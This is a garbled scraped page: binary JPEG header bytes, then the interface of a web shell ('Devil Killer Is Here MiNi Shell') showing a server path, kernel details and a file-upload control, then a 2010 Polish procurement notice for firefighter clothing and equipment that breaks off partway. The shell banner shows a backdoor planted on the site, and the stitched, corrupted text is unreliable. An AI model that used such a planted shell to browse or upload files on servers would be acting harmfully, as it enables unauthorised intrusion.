JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100614/167136-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa odzieży specjalnej i środków ochrony indywidualnej użytkowanych w Państwowej Straży Pożarnej, w tym:
część I Ubranie specjalne
część II Rękawice specjalne
część III Kominiarka
część IV Buty strażackie
część V Hełm strażacki
część VI Toporek lekki
część VII Pas strażacki
część VIII Zatrzaśnik strażacki duży
część IX Koszulka letnia i koszulka zimowa</b><br>
<b>Numer ogłoszenia: 167136 - 2010; data zamieszczenia: 14.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Główna Służby Pożarniczej , ul. Słowackiego 52/54, 01-629 Warszawa, woj. mazowieckie, tel. 022 5617624, faks 022 8330724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sgsp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odzieży specjalnej i środków ochrony indywidualnej użytkowanych w Państwowej Straży Pożarnej, w tym:
część I Ubranie specjalne
część II Rękawice specjalne
część III Kominiarka
część IV Buty strażackie
część V Hełm strażacki
część VI Toporek lekki
część VII Pas strażacki
część VIII Zatrzaśnik strażacki duży
część IX Koszulka letnia i koszulka zimowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia znajduje się w Rozdziale II siwz  Opis szczegółowy przedmiotu zamówienia.
Przedmioty umundurowania które wchodzą w zakres części od I do VIII przedmiotu zamówienia wykonane muszą być min. zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.
Natomiast przedmioty umundurowania, które wchodzą w zakres części IX przedmiotu zamówienia, wykonane muszą być min zgodnie z Wymaganiami Technicznymi, określonymi  w Zarządzeniu Nr 9 Komendanta Głównego Państwowej Straży Pożarnej z dnia 5 lutego 2007 r. w sprawie wzorców oraz szczegółowych wymagań, cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w Państwowej Straży Pożarnej Dz. U. KGPSP nr 2  z dnia  23 października 2009 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W trybie   art. 67 ust. 1 pkt. 7 Pzp., dopuszcza się udzielenie zamówień uzupełniających Wykonawcy dostaw, stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegających na rozszerzeniu dostawy zgodnej z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 35.81.11.00-3, 18.42.40.00-7, 18.44.41.00-4, 18.83.20.00-0, 18.44.41.11-4, 18.40.00.00-3, 18.40.00.00-3, 18.40.00.00-3, 18.33.20.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1 Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości: 
- część I:    	2000, 00 zł słownie: dwa tysiące złotych
- część II:	300,00 zł słownie: trzysta złotych
- część III:	Nie wymaga się
- część IV:	700, 00 zł słownie: siedemset złotych
- część V:	1200, 00 zł słownie: tysiąc dwieście złotych
- część VI:	550, 00 zł słownie: pięćset pięćdziesiąt złotych
- część VII:	Nie wymaga się
- część VIII:	Nie wymaga się
- część IX:	600, 00 zł słownie: sześćset złotych
2. Wadium może być wniesione w następujących formach:
- pieniądzu, na rachunek bankowy nr 08102010260000120200877860 w PKO BP 
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

3. Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowych lub gwarancji ubezpieczeniowych należy złożyć w oryginale w siedzibie Zamawiającego w Dziale Zamówień Publicznych - pok. nr 323.
4.Wadium musi być wniesione najpóźniej do dnia 21.06.2010 r., do godz. 1400.
5. Za skutecznie wniesione wadium w pieniądzu Zamawiający uważa wadium, które 
wpłynie na konto Zamawiającego do dnia 21.06.2010 r. włącznie.
6. Wadium wniesione w terminie późniejszym niż określony w pkt. 4 i 5 zostanie uznane za wniesione po terminie i skutkować będzie wykluczeniem Wykonawcy z postępowania.
7. Dyspozycja w zakresie zwrotu wadium określona została w art. 46 Ustawy Pzp. 
8. Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) oświadczenia, którego treść stanowi załącznik nr 3 do SIWZ,

b) dokumentu potwierdzającego uprawnienia do realizowania dostaw produktów objętych przedmiotem zamówienia , np. 
Odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.  Aktualne świadectwo dopuszczenia wyrobu do użytkowania wydane przez CNBOP w Józefowie, zgodne z §6 Rozporządzenia MSWiA z dnia 20 czerwca 2007 r.  Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm. - nie dotyczy części IX Koszulka letnia i koszulka zimowa.

2. Deklaracja zgodności WE dla oferowanego produktu, sporządzona zgodnie z § 36 rozporządzenia Ministra Gospodarki z dnia 21 grudnia 2005 r. w sprawie zasadniczych wymagań dla środków ochrony indywidualnej  Dz. U. z 2005 r. Nr 259, poz. 2173 - nie dotyczy części IX Koszulka letnia i koszulka zimowa.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto:
1. Formularz oferty

Na etapie odbioru przedmiotu umowy, Wykonawca, którego oferta zostanie wybrana za najkorzystniejszą i zostanie z nim zawarta umowa, będzie zobowiązany złożyć w oryginale lub kserokopię poświadczoną za zgodność z oryginałem: 

1. Certyfikat oceny typu WE wydany przez jednostkę notyfikowaną właściwą dla danego środka ochrony indywidualnej - nie dotyczy części VI , VII, VIII i IX.
2. Ostatnie sprawozdanie z badań przeprowadzone w ramach sprawowania nadzoru nad certyfikatem WE przez jednostkę  notyfikowaną, z którą została zawarta umowa o której mowa w pkt. 2, zgodnie z § 40 lub § 41 rozporządzenia Ministra Gospodarki z dnia 21 grudnia 2005 r. - nie dotyczy części VI , VII, VIII i IX.
3. Instrukcję użytkowania , przechowywania i konserwacji wykonaną zgodnie z obowiązującymi przepisami dla oferowanej odzieży lub środka ochrony indywidualnej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany  istotnych postanowień zawartej umowy, w stosunku do treści oferty, w zakresie: 
1).terminu realizacji przedmiotu zamówienia - gdy wystąpi konieczność zmiany terminu w związku z wydłużającym się postępowaniem lub zaistnieją okoliczności mające wpływ na termin realizacji, a których nie udało się przewidzieć w chwili zawarcia umowy.
2) parametrów technicznych przedmiotu zamówienia - w przypadku gdy zmiany te będą korzystniejsze dla zamawiającego
Powyższe zmiany będą dopuszczalne, przy założeniu, że nie ulegnie zmianie cena ofertowa.  Każda ewentualna zmiana wymagać będzie odrębnego rozpatrzenia i zasadności jej wprowadzenia oraz wymagać będzie formy aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sgsp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> osobiście w siedzibie SGSP w Dziale Zamówień Publicznych, w godz. 0800 - 1500  - Obiekt 02, pok. 323 lub na wniosek wykonawcy za pośrednictwem poczty..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2010 godzina 10:00, miejsce: Warszawa - Szkoła Główna Służby Pożarniczej - kancelaria ogólna SGSP, mieszcząca się w obiekcie 02 SGSP przy  ul. Siemiradzkiego 2,  pokój 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ubranie specjalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis:
Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.6. Ubrania specjalne określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.). 

Wyrób powinien spełniać wymagania obowiązujących norm scharmonizowanych w tym:
- PN - EN 469:2008,
- Poziom ochrony - 2.

Oznakowanie wyrobu:
Zgodne z obowiązującymi przepisami w tym z §17 Rozporządzenia MSWiA z dnia      20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Z wariantowych wymagań wybiera się:
- Warstwy kurtki jako oddzielne (odpinana podpinka).
- Na wysokości kolan dodatkowy wkład i wzmocnienia chroniące staw kolanowy.

Ponadto:
1. Tkanina zasadnicza: udział włókien aramidowych lub równoważnych min. 90%, 

2. Nici i szwy: wszystkie szwy powinny być szyte nićmi aramidowymi lub równoważnymi,

3. Zamek w kurtce: metalowy, mocny, grubocząstkowy, dwugłowicowy rozpinany na wysokości krocza. 

Gwarancja:
Minimum 36 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rękawice specjalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.7. Rękawice specjalne określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).

Wyrób powinien spełniać wymagania obowiązujących norm scharmonizowanych w tym:
- PN- EN 659,

Oznakowanie wyrobu:

- Zgodne z obowiązującymi przepisami w tym z §17 Rozporządzenia MSWiA z dnia               20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z poźn. zm. ),
- rozmiar

Ponadto:
- mankiet zachodzący na rękaw ubrania specjalnego,
- podszewka z tkaniny z włókien aramidowych lub równoważnych,
- membrana paroprzepuszczalna - oddychająca.

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.40.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kominiarka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.8. KOMINIARKI określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).

Wyrób powinien spełniać wymagania obowiązujących norm scharmonizowanych w tym:
- PN-EN 13911

Oznakowanie wyrobu:

- Zgodne z obowiązującymi przepisami w tym z §17 Rozporządzenia MSWiA z dnia               20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.),
- rozmiar

Gwarancja:
Minimum 24 m-ce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.44.41.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Buty strażackie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.9. Buty Strażackie określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).

Wyrób powinien spełniać wymagania obowiązujących norm scharmonizowanych w tym:

- PN-EN 15090 
- PN-O-91123

Oznakowanie wyrobu:

Zgodne z obowiązującymi przepisami w tym z §17 Rozporządzenia MSWiA z dnia               20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z póżn. zm.).


Z wariantowych wymagań wybiera się:
- model D, 
- sznurowane z systemem wiązań i zamków błyskawicznych, zapewniającym dopasowanie obuwia do nóg użytkownika.
- wykonane ze skóry w kolorze czarnym

Ponadto:
- buty z membraną wodoodporną, 
- sznurowadła wykonane z materiałów niepalnych - włókna aramidowe lub równoważne,
- szyte nićmi z włókien niepalnych - aramidowych lub równoważne,
- zamek błyskawiczny z mechanizmem blokującym,
- muszą posiadać system odprowadzania wilgoci z przestrzeni pomiędzy skórą i membraną,
- muszą posiadać metalowy lub inny równorzędny podnosek chroniący palce przed zgnieceniem oraz stalową lub równoważną międzypodeszwę w całej długości podeszwy chroniącą stopę przed przebiciem,
- muszą posiadać wszyty przegub z miękkiej skóry nad podbiciem stopy i nad piętą, ułątwiający ruch stopy lub rozwiązanie równoważne,
- podeszwa wykonana z gumy, posiadająca samoczyszczący profil, odporna na działanie oleju napędowego, etyliny. Urzeźbienie podeszwy powinno być takie, żeby nie było ciągłych prostoliniowych rowków przecinających poprzecznie podeszwę o wysokości nie mniejszej niż 3mm, w śródstopiu poprzeczne urzeźbienie, którego wysokość powinna wynosić co najmniej 1,5 mm,
- konstrukcja wykonana w taki sposób, że przegub nad podpiciem stopy i nad piętą musi ułatwiać ruch stopy.

Gwarancja:
Minimum 24 m-ce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Hełm strażacki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonany zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.10. Hełmy strażackie określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).

Wyrób powinien spełniać wymagania obowiązujących norm scharmonizowanych w tym:
PN-EN 443:2008.

Z wariantowych wymagań wybiera się:
- kolor czerwony,
- osłona karku  wykonana z tkaniny (niemetalizowanej),
- osłona twarzy i oczu (przyłbica) mocowana do hełmu wewnątrz skorupy

Wymagane wyposażenie dodatkowe:
1) zaczepy do współpracy z nahełmowymi maskami aparatów oddechowych,
2) gniazdo, uchwyt - do zamocowania latarki,

Dopuszcza się wyposażenie dodatkowe:
(za które oferta otrzyma dodatkowe punkty określone w Rozdziale I pkt. 9. OPIS KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ PRZY WYBORZE OFERTY, WRAZ Z PODANIEM ZNACZENIA TYCH KRYTERIÓW I SPOSOBU OCENY OFERT - część V):
 
1) dodatkowa osłona oczu okulary (oprócz przyłbicy) mocowana do hełmu wewnątrz skorupy. 
2) Metalizowana osłona twarzy i oczu (przyłbica),
3) Osłona karku chroniąca również szyję i krtań (wykonana z tkaniny niemetaliozwanej)

Ponadto:
Zamiast wymaganego numeru JRG, którego Szkoła nie posiada, na czołowej stronie czerepu powinno być umieszczone Logo Zamawiającego wg podanego wzoru:

- Logo ma być umieszczone na białym tle w formie kwadratu o wymiarach 4 cm x 4 cm,
- Średnica logo 3,5 cm,
- Logo musi być zabezpieczone żywicą epoksydową lub inną skuteczną metodą - celem zabezpieczenia przed zniszczeniem.
4 cm


Opis logo:
Znak ma po lewej stronie połowę krzyża maltańskiego w kolorze granatowym, a po prawej trzy języki płomienia w kolorze czerwonym, wszystko w wieńcu z liści w kolorze złotym.     W dole litery SGSP  w kolorze czarnym na czworoboku w kolorze złotym mającym jeden bok wypukły i jeden wklęsły, przy czym wszystkie elementy obrazowe mają kontur w kolorze czarnym.

Oznakowanie wyrobu:
Zgodne z obowiązującymi przepisami w tym z §17 Rozporządzenia MSWiA z dnia       20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z póżn. zm.).

Gwarancja:
Minimum 24 m-ce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.44.41.11-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Wyposażenie dodatkowe - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Toporek lekki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Topór lekki - Wykonany zgodnie z Polską Normą PN-M-51501, wg. pkt. 6.4. Topory strażackie określonym szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Oznakowanie wyrobu:
